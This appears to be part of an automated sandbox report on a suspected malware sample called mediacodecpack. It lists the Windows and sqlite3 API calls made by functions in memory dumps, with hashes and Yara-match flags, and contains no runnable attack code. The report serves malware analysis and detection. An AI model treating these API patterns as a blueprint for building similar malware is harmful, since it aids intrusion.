                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                • String ID: |
                                                                                • API String ID: 1576672187-2343686810
                                                                                • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                APIs
                                                                                • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                  • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                • API String ID: 652164897-1572359634
                                                                                • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E3A
• GetStdHandle.KERNEL32(000000F4,00408574,00000000,?,00000000,00000000), ref: 00403F10
• WriteFile.KERNEL32(00000000), ref: 00403F17
Strings
Memory Dump Source
• Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3784150691-4022980321
• Opcode ID: 04cfe4ace2dd9675a620efbbcb8461293764693c9a36d9750f915388fa73d055
• Instruction ID: 1325ef8c40c3fac29ee6baa2b36e74f90486e8040fe1898f7fb10d69898ee010
• Opcode Fuzzy Hash: 04cfe4ace2dd9675a620efbbcb8461293764693c9a36d9750f915388fa73d055
• Instruction Fuzzy Hash: 3331C172A002186FDF24EA60DE4AFEA776CAB45304F10057FF584F61D1DAB8AE448A5D
APIs
• sqlite3_value_text.SQLITE3 ref: 6091B06E
• sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
• sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
• sqlite3_result_text.SQLITE3 ref: 6091B5A3
Memory Dump Source
• Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
• String ID:
• API String ID: 2352520524-0
• Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
• Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
• Opcode Fuzzy Hash: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
• Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
APIs
  • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
  • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
  • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
• sqlite3_exec.SQLITE3 ref: 6096A4D7
  • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
• sqlite3_result_text.SQLITE3 ref: 6096A5D3
  • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
  • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
  • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
• sqlite3_exec.SQLITE3 ref: 6096A523
• sqlite3_exec.SQLITE3 ref: 6096A554
• sqlite3_exec.SQLITE3 ref: 6096A57F
• sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
Strings
Memory Dump Source
• Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
• String ID: optimize
• API String ID: 3659050757-3797040228
• Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
• Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
• Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
• Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
APIs
• sqlite3_malloc.SQLITE3 ref: 609645D9
  • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
• sqlite3_free.SQLITE3 ref: 609647C5
  • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
• sqlite3_free.SQLITE3 ref: 6096476B
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
• sqlite3_free.SQLITE3 ref: 6096477B
• sqlite3_free.SQLITE3 ref: 60964783
Memory Dump Source
• Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
• String ID:
• API String ID: 571598680-0
• Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
• Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
• Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
• Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
APIs
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040372D
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 00403741
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 0040376D
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037A5
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037C7
• FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402AA4), ref: 004037E0
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402AA4), ref: 004037F3
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403831
Memory Dump Source
• Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
Similarity
• API ID: EnvironmentStrings$ByteCharFreeMultiWide
• String ID:
• API String ID: 1823725401-0
• Opcode ID: 7f1ee2c931afbeb2bcd72820eb8f065979dd47f7a99393091ec5d7620f58e433
• Instruction ID: 45b108152198534a65e95edcfca0b8ba0a54c8eec5aa0c4c05c1d64ec2385aa0
• Opcode Fuzzy Hash: 7f1ee2c931afbeb2bcd72820eb8f065979dd47f7a99393091ec5d7620f58e433
• Instruction Fuzzy Hash: 2131D2F35082619ED7203F745DC483BBE9CEA4530A715453FF981F3280DA795D4286A9
APIs
• OpenEventA.KERNEL32(00100002,00000000,00000000,5304F1C2), ref: 02D106C0
• CloseHandle.KERNEL32(00000000), ref: 02D106D5
• ResetEvent.KERNEL32(00000000,5304F1C2), ref: 02D106DF
• CloseHandle.KERNEL32(00000000,5304F1C2), ref: 02D10714
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,5304F1C2), ref: 02D1078A
• CloseHandle.KERNEL32(00000000), ref: 02D1079F
Memory Dump Source
• Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$CreateOpenReset
• String ID:
• API String ID: 1285874450-0
• Opcode ID: 2ec5ff4be6a77ab5b063508f30d9070a5f46893fd45647bf8dbc7585676d5003
• Instruction ID: e8a71bfcc7bd5d12c6592095300c69851415c357affb9f162c89e854d2abcbd4
• Opcode Fuzzy Hash: 2ec5ff4be6a77ab5b063508f30d9070a5f46893fd45647bf8dbc7585676d5003
• Instruction Fuzzy Hash: 07414C70D04358ABDF21DBA4E848BAEB7B9BF05725F644219E818AB780D7309D45CFA0
APIs
• InterlockedExchange.KERNEL32(?,00000001), ref: 02D020AC
• SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D020CD
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D020D8
• InterlockedDecrement.KERNEL32(?), ref: 02D0213E
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02D0217A
• InterlockedDecrement.KERNEL32(?), ref: 02D02187
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D021A6
Memory Dump Source
• Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
• String ID:
• API String ID: 1171374749-0
• Opcode ID: 4528ce333cb5b8058c7f09c098832152bd25980a5191f509a9b7503c40df607b
• Instruction ID: 2b0f21e46cfc1aabdb72d2df4f1ebc6a63ce24cc3e2f77dcc507ce3fde2b2ec2
• Opcode Fuzzy Hash: 4528ce333cb5b8058c7f09c098832152bd25980a5191f509a9b7503c40df607b
• Instruction Fuzzy Hash: 704108715047019FC325DF25D888E6BBBF9FBD8754F504A1EA896827A0D730E909CFA2
APIs
  • Part of subcall function 02D10EE0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02D1073E,?,?), ref: 02D10F0F
  • Part of subcall function 02D10EE0: CloseHandle.KERNEL32(00000000,?,?,02D1073E,?,?), ref: 02D10F24
  • Part of subcall function 02D10EE0: SetEvent.KERNEL32(00000000,02D1073E,?,?), ref: 02D10F37
• OpenEventA.KERNEL32(00100002,00000000,00000000,5304F1C2), ref: 02D106C0
• CloseHandle.KERNEL32(00000000), ref: 02D106D5
• ResetEvent.KERNEL32(00000000,5304F1C2), ref: 02D106DF
• CloseHandle.KERNEL32(00000000,5304F1C2), ref: 02D10714
• __CxxThrowException@8.LIBCMT ref: 02D10745
  • Part of subcall function 02D131CA: RaiseException.KERNEL32(?,?,02D0EB63,?,?,?,?,?,?,?,02D0EB63,?,02D2ECA8,?), ref: 02D1321F
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,5304F1C2), ref: 02D1078A
• CloseHandle.KERNEL32(00000000), ref: 02D1079F
  • Part of subcall function 02D10C20: GetCurrentProcessId.KERNEL32(?), ref: 02D10C79
• WaitForSingleObject.KERNEL32(00000000,000000FF,5304F1C2), ref: 02D107AF
Memory Dump Source
• Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
• String ID:
• API String ID: 2227236058-0
• Opcode ID: e39c1cd6caf9495a29d5fdccaf440f9da89e2ef200f83bd2888a2633b19137cf
• Instruction ID: abe68abe88105598ef7995c6798ffa845b66ecf7e10491ee85c9e915e0d66294
• Opcode Fuzzy Hash: e39c1cd6caf9495a29d5fdccaf440f9da89e2ef200f83bd2888a2633b19137cf
• Instruction Fuzzy Hash: CA314C71D00358BBDB21EBA4AC44BADB7B9AF05316F144129EC18EB780E7309D85CFA1
APIs
• sqlite3_blob_reopen.SQLITE3 ref: 60963510
  • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
• sqlite3_mprintf.SQLITE3 ref: 60963534
• sqlite3_blob_open.SQLITE3 ref: 6096358B
• sqlite3_blob_bytes.SQLITE3 ref: 609635A3
• sqlite3_malloc.SQLITE3 ref: 609635BB
• sqlite3_blob_read.SQLITE3 ref: 60963602
• sqlite3_free.SQLITE3 ref: 60963621
Memory Dump Source
• Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
• String ID:
• API String ID: 4276469440-0
• Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
• Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
• Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
• Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                APIs
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                Strings
                                                                                • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                • API String ID: 4080917175-264706735
                                                                                • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                APIs
                                                                                  • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID: library routine called out of sequence$out of memory
                                                                                • API String ID: 2019783549-3029887290
                                                                                • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                APIs
                                                                                • __init_pointers.LIBCMT ref: 02D14A04
                                                                                  • Part of subcall function 02D170C0: RtlEncodePointer.NTDLL(00000000), ref: 02D170C3
                                                                                  • Part of subcall function 02D170C0: __initp_misc_winsig.LIBCMT ref: 02D170DE
                                                                                  • Part of subcall function 02D170C0: GetModuleHandleW.KERNEL32(kernel32.dll,?,02D2F248,00000008,00000003,02D2EC8C,?,00000001), ref: 02D17E41
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D17E55
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D17E68
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D17E7B
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D17E8E
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02D17EA1
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02D17EB4
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02D17EC7
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D17EDA
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02D17EED
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02D17F00
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02D17F13
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02D17F26
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02D17F39
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02D17F4C
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02D17F5F
                                                                                • __mtinitlocks.LIBCMT ref: 02D14A09
                                                                                • __mtterm.LIBCMT ref: 02D14A12
                                                                                  • Part of subcall function 02D14A7A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02D174F6
                                                                                  • Part of subcall function 02D14A7A: _free.LIBCMT ref: 02D174FD
                                                                                  • Part of subcall function 02D14A7A: RtlDeleteCriticalSection.NTDLL(02D31978), ref: 02D1751F
                                                                                • __calloc_crt.LIBCMT ref: 02D14A37
                                                                                • __initptd.LIBCMT ref: 02D14A59
                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D14A60
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                • String ID:
                                                                                • API String ID: 3567560977-0
                                                                                • Opcode ID: ba9fa935f5a3a329a6446a28ed17fecfacda1a460c0462daee670e9d25697611
                                                                                • Instruction ID: 85802e1cfa4011ba38816181d227c8305ea541e5ab9386e2763ed3126e2946f4
                                                                                • Opcode Fuzzy Hash: ba9fa935f5a3a329a6446a28ed17fecfacda1a460c0462daee670e9d25697611
                                                                                • Instruction Fuzzy Hash: 1AF0CD3294C6123DF674BB78BC1176A2B92DF01738F224A19E025D9FE0FF11CC019964
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02D12483,00000000), ref: 02D124EB
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D124F2
                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 02D124FE
                                                                                • RtlDecodePointer.NTDLL(00000001), ref: 02D1251B
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                • String ID: RoInitialize$combase.dll
                                                                                • API String ID: 3489934621-340411864
                                                                                • Opcode ID: c8b8b93b505bfdd5f2d5efd7afe971d688a81a6ef041812f50e796d44f9a51e9
                                                                                • Instruction ID: 38fa4480e158f72a35c187dea723b08fc201f8433bdbb65336a49036c6dbae40
                                                                                • Opcode Fuzzy Hash: c8b8b93b505bfdd5f2d5efd7afe971d688a81a6ef041812f50e796d44f9a51e9
                                                                                • Instruction Fuzzy Hash: 42E0ED71BD4310AAEB301BB4FC9DF143BA4A760746F614820B056D5384C7B98C6D8A10
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D124C0), ref: 02D125C0
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D125C7
                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 02D125D2
                                                                                • RtlDecodePointer.NTDLL(02D124C0), ref: 02D125ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                • String ID: RoUninitialize$combase.dll
                                                                                • API String ID: 3489934621-2819208100
                                                                                • Opcode ID: 1168fccf76f121864a9ec6e431405878403dfbe09acbf745ba4c5edc221937f3
                                                                                • Instruction ID: 21fce354dbe8b4e373292d220e79cb13d44b0ae9ac2033b45e62b9a35fe0ee66
                                                                                • Opcode Fuzzy Hash: 1168fccf76f121864a9ec6e431405878403dfbe09acbf745ba4c5edc221937f3
                                                                                • Instruction Fuzzy Hash: 7FE09270AC0320ABEB295B60FD5DF143B68A714719F610824F506A6384DBBD9C688E50
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(0000002B,5304F1C2,?,?,?,?,00000000,02D240D8,000000FF,02D111DA), ref: 02D10F7A
                                                                                • TlsSetValue.KERNEL32(0000002B,02D111DA,?,?,00000000), ref: 02D10FE7
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D11011
                                                                                • HeapFree.KERNEL32(00000000), ref: 02D11014
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HeapValue$FreeProcess
                                                                                • String ID:
                                                                                • API String ID: 1812714009-0
